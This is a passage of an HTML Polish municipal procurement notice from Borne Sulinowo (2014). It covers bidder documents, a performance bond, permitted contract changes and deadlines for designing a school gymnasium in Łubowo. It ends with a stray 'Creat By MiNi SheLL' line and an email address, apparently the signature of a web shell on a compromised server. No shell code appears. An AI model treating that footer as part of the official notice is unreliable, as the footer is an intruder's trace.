<ul class="kh_indent_1"><li><p>- Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, na podstawie, których Zamawiający przeprowadzi ocenę spełnienia warunku.

spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- pisemne zobowiązanie podmiotu oddającego do dyspozycji niezbędne zasoby w okresie realizacji zadania
Wykonawca, którego oferta zostanie wybrana będzie musiał wnieść zabezpieczenie należytego wykonania umowy w wysokości 7% ceny całkowitej podanej w ofercie.
3.	Zabezpieczenie należytego wykonania umowy można wnieść w formach wymienionych w art. 148 ust. 1 ustawy - Prawo zamówień publicznych.
4.	Zamawiający nie wyraża zgody na wniesienie zabezpieczenia należytego wykonania umowy w formach wymienionych w art. 148 ust. 2 ustawy - Prawo zamówień publicznych.
5.	Wykonawcy zobowiązani są do wniesienia pełnej kwoty zabezpieczenia należytego wykonania umowy przed zawarciem umowy. 
6.	Zabezpieczenie wnoszone w pieniądzu Wykonawca zobowiązany będzie wpłacić przelewem na rachunek bankowy Zamawiającego: 
PBS O/W Bornem Sulinowie Nr: 82 8581 1056 0300 2004 2000 0004
 z podaniem tytułu wpłaty: zabezpieczenie należytego wykonania umowy - Wykonanie kompleksowej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem decyzji o pozwoleniu na budowę oraz pełnienie wielobranżowego nadzoru autorskiego dla zadania rozbudowy z przebudową budynku Zespołu Szkół w Łubowie o budynek sali gimnastycznej z zapleczem socjalno-technicznym i higieniczno-sanitarnym oraz pomieszczeniami stołówki z pełnym zapleczem kuchennym, socjalnym i magazynowym. 
7.	W przypadku wniesienia wadium w pieniądzu, za zgodą Wykonawcy, kwota wadium może zostać zaliczona na poczet zabezpieczenia.
8.	W przypadku wniesienia zabezpieczenia w formie innej niż pieniądz, oryginał dokumentu potwierdzającego wniesienie zabezpieczenia należytego wykonania umowy musi być dostarczony do Zamawiającego przed podpisaniem umowy. 
9.	Zabezpieczenie w formie niepieniężnej powinno być sporządzone zgodnie z obowiązującym prawem i zawierać bezwarunkowe zobowiązanie do wypłaty Zamawiającemu na każde jego żądanie pełnej kwoty zabezpieczenia, zabezpieczenie powinno być zabezpieczać umowę przez minimum czas jej trwania wraz z okresem gwarancyjnym.
10.	Zamawiający zwróci kwotę stanowiąca 70% zabezpieczenia w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane.
11.	Kwotę stanowiącą 30% wysokości zabezpieczenia Zamawiający pozostawi na zabezpieczenie roszczeń z tytułu  rękojmi. 
12.	Kwota, o której mowa w pkt 11 zostanie zwrócona nie później niż w 15 dniu po upływie okresu rękojmi.
13.	Wykonawca może w każdej chwili dokonać zmiany formy wniesienia zabezpieczenia z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Szczegółowy katalog zmian, na podstawie którego możliwa będzie zmiana zapisów   zawartej umowy:
1.	zmiana harmonogramu i finansowania zadania;
2.	zmiana osób reprezentujących Zamawiającego lub Wykonawcę;
3.	zmiana siedziby Zamawiającego lub Wykonawcy;
4.	zmiany numerów kont bankowych stron zamówienia;
5.	Zamawiający przewiduje możliwość zmiany terminu realizacji zamówienia w przypadku przedłużenia się procedur uzyskania decyzji administracyjnych, za które Wykonawca nie ponosi odpowiedzialności pomimo zachowania należytej staranności.
6.	Zmiana terminu wykonania przedmiotu umowy nie może przekroczyć czasu trwania okoliczności, o których mowa w pkt.5 oraz czasu niezbędnego do usunięcia skutków tych okoliczności.
7.	Zamawiający dopuszcza możliwość zmian w zespole osób wykonujących zamówienie w przypadku zaistnienia niezawinionych przez Wykonawcę zdarzeń losowych lub ustania więzi prawnych łączących go z nimi. W tych przypadkach Wykonawca zobowiązany jest do zgłoszenia do Zamawiającego i udokumentowania tych zdarzeń. zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie nie leży w interesie Zamawiającego;
8.	zmiana terminu realizacji zamówienia w przypadku:
a.	gdy wykonanie zamówienia w pierwotnym terminie nie leży w interesie Zamawiającego;
b.	gdy nastąpi zwiększenie zakresu przedmiotu zamówienia, niezbędnego do prawidłowego zakończenia realizowanego zadania;
c.	zmiany przepisów prawnych zaistniałej w okresie projektowania, o ile zmiana taka wymagać będzie wprowadzenia istotnych zmian do uprzednio wykonanych elementów dokumentacji i powodować konieczność zmiany terminu wykonania umowy, zmiany w tym zakresie będą dokonane z uwzględnieniem okresu niezbędnego do wprowadzenia zmian
d.	wystąpienia konieczności wykonania dodatkowych badań i ekspertyz;
e.	wystąpienia konieczności wykonania prac lub badań archeologicznych
f.	poczynienia ustaleń w trakcie narad Wykonawcy z Zamawiającym, zmierzających ku maksymalnemu zabezpieczeniu wymagań Zamawiającego w zakresie opracowania przedmiotowej dokumentacji, podyktowanych koniecznością zwiększenia bezpieczeństwa użytkowania obiektu budowlanego, zapobieżeniem powstania w przyszłości strat dla Zamawiającego oraz uzyskaniem założonego efektu użytkowego;
9.	zmiana wynagrodzenie brutto wynikająca z urzędowych zmian w obowiązujących przepisach podatkowych tj. zmiana podatku VAT.
10.	 aktualizacja rozwiązań z uwagi na postęp lub zmianę obowiązujących przepisów mających wpływ na realizację zamówienia:
11.	zmiana podwykonawców</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bornesulinowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Al. Niepodległości 6, 78-449 Borne Sulinowo pok. 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2014 godzina 12:00, miejsce: Urząd Miejski Al. Niepodległości 6, 78-449 Borne Sulinowo pok. 20 - sekretariat Burmistrza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com